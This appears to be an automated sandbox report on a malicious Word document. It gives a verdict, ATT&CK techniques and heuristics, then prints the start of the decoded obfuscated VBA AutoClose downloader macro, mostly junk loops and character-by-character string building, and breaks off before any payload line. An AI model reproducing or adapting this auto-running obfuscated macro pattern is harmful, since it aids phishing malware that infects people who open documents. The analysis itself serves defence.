Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic); T1566.001 (Phishing: Spearphishing Attachment)
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Valyria-6595163-0. Static analysis revealed a legacy WordBasic AutoClose macro, which is a known indicator of malicious documents. The presence of GetObject calls within the macro further suggests an attempt to execute arbitrary code, likely for downloading and running a secondary payload. The macro's obfuscated nature and the lack of clear network indicators prevent a more specific family attribution.
Heuristics (7)
- ClamAV: Doc.Downloader.Valyria-6595163-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44733 bytes |

SHA-256 of macros.bas: e2b6454feec665442ab992d021eb0570ffbc61602f53b4a7f098a77f96adfc71

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
Dim teVewYSaFaliKUCaMy
teVewYSaFaliKUCaMy = 76522
Dim lYcUlIwoZiDSuWaVyJ
For lYcUlIwoZiDSuWaVyJ = 6 To 13
Dim HoXOZuFejYbuSOxyNAdEZ
HoXOZuFejYbuSOxyNAdEZ = Fix(7055)
Next
hUgumaDaZEg = "synOvIqiSYramYVo"
On Error Resume Next
XAHeTOVIjEDA = "ocYSySeDySyn"
Dim lAwOnaxCuc
For lAwOnaxCuc = 6 To 11
Dim loVohmIhI
loVohmIhI = Fix(72508)
Next
Dim lUJoMoBaju
For lUJoMoBaju = 2 To 12
Dim KUsiVOLETUPOrEs
KUsiVOLETUPOrEs = Fix(48415)
Next
Dim LukEzETUGuHEteZUxUzAv
LukEzETUGuHEteZUxUzAv = 76075
sULlOcyPYqAcowIX = 26805
BiZYpamYlixeXoWaJyh = "HumaxuFeWiEpyCahU"
tALeCirEtyKE = Val("93648") & "haiIliJisAkIfuZOmItOLY"
wiDoQoQihywywoQAteF = "hJokoGOjItAWi"
WeLOQyRiYVIBOcUcIZAR = "iuTanEZAZUheTiIfPu"
hosedOCUdIsyLiz = Val("73490") & "aYheCynuYmuZU"
vAcuiEaYCAG = 20221
BytEtZYdAsefA = 39154
qHaMOJAsESeXA = 32743
guVEDUgiaowiz = "zidIaIxek"
beCafofaXInUNELA = Val("29635") & "JyvUHydAiXOioROaOz"
bESOgAKizIfelO = StrReverse("")
GIvILoxiuSARIPugi = Val("99760") & "CiQTTiZiBAgiloj"
ralobirYFYZYKeC = "JAikaaadaVACA"
ZuzaJonemaWAruWIVA = 29094
niNUjtuFoJOFriV = 87557
DizAgOhaWyDODaC = "ziepEjiPz"
Dim qEhERUJKekyaEsatISERU
For qEhERUJKekyaEsatISERU = 5 To 12
Dim hEledoPIJACYgaXoJE
SLUcivOj = Val("6817") & "GaPIsOjuSIraW"
Dim fJbOLiCiplIgYMI
For fJbOLiCiplIgYMI = 2 To 10
Dim PaduhucyNOWigYda
PaduhucyNOWigYda = Fix(16045)
Next
PULUaifoJEN = "iiRiqIjyvU"
hEledoPIJACYgaXoJE = Fix(26055)
Dim keaEnuGiPeWduxeBaA
keaEnuGiPeWduxeBaA = 98915
Next
Dim GASYaYSIpio
SUZupEAZacO = 56839
kOwAGojev = Val("45389") & "MYSuaoDaqOBe"
Dim iumIgabAzEl
iumIgabAzEl = 88301
GASYaYSIpio = 45701
liXESfYk = 600
FirYdyCuQYtaLY = 14401
Dim GUiYiywEGOMYm
For GUiYiywEGOMYm = 5 To 13
Dim checElyGY
checElyGY = Fix(22955)
Next
rElYsIwAveiyG = "mogobUhYR"
Dim myjINOwUWA
For myjINOwUWA = 3 To 10
Dim vAVANiWeQaFaNi
vAVANiWeQaFaNi = Fix(80231)
Next
ZaNaJIvYlAdYwatEzukemY = "relUJquZUXO"
Dim JUQUasyqeVq
JUQUasyqeVq = 88436
wuwYtiVyhubyc = Val("61578") & "ZliQwoRUZopaqalU"
Dim qpOtOtEBoMERizuN
qpOtOtEBoMERizuN = 83432
Dim ryGETUPYxei
For ryGETUPYxei = 6 To 10
Dim cEvyCYqypUhI
cEvyCYqypUhI = Fix(35661)
Next
Dim fyvoMOxuxT
For fyvoMOxuxT = 1 To 12
Dim TYzaSEfex
TYzaSEfex = Fix(55508)
Next
Dim aYwuRleliBIsyFU
For aYwuRleliBIsyFU = 0 To 12
Dim HYuzEvEaeRYjaCdatiGy
HYuzEvEaeRYjaCdatiGy = Fix(66424)
Next
Dim NaKaTybyTSihiZElugiQy
For NaKaTybyTSihiZElugiQy = 5 To 10
Dim aedoTEniFejIvYVODIWO
aedoTEniFejIvYVODIWO = Fix(84109)
Next
bqeZoBiupIieiocE = 40507
Dim XUxaPYMECEcOSaiOROZAr
For XUxaPYMECEcOSaiOROZAr = 7 To 11
Dim qeCaxOTgitYQs
qeCaxOTgitYQs = Fix(34970)
Next
iEraNujUBEk = "voPXorIvUNAjipAD"
gonYbegfYmUsUbYls = Val("6847") & "TycUkILoJeCokYLI"
TaXEnaASIJYceqiM = "asIwapiXifAiIBuHAHy"
KEzValOryWAzyvYzegd = 82659
guNYsaxujEtYRET = 85219
FYdYsEsEFOQJYgAgES = Val("24035") & "NiTAwoQerO"
Dim wIkeHEgabYTe
For wIkeHEgabYTe = 8 To 11
Dim ZyTaqisIHUqyVEVacOsIj
ZyTaqisIHUqyVEVacOsIj = Fix(19698)
Next
NYBexawAjapoz = "tutoZYCeZtukYPIvANijE"
Dim xaBoCUpyQovanapIlEfaX
For xaBoCUpyQovanapIlEfaX = 4 To 10
Dim iemowYFOKOtpuxy
ciaurageQUcOiEWOTizuTO = Val("7442") & "XaiIGoVOaixYm"
TUiALyzigS = "gxIWEtoCGuZEieXOtuxi"
QyrAiuWEBYf = 97778
iemowYFOKOtpuxy = Fix(64083)
Next
GOHUQYTIRAf = Val("15204") & "qavVudizIPajjUbO"
duNoRIgia = 87009
bESOgAKizIfelO = bESOgAKizIfelO + IIf((262 + 524) = 786, "s", "Q")
Dim TAdOSiRIViaedxYJykAG
For TAdOSiRIViaedxYJykAG = 0 To 12
Dim wiJUCEsuLEAlExAt
wiJUCEsuLEAlExAt = Fix(51411)
Next
Dim WUcyQiemaRIHasYBid
WUcyQiemaRIHasYBid = 33966
Dim haPufywIHyWIB
For haPufywIHyWIB = 2 To 12
Dim JEVYsEXuTySeEsiSoTEB
JEVYsEXuTySeEsiSoTEB = 82350
Di
... (truncated)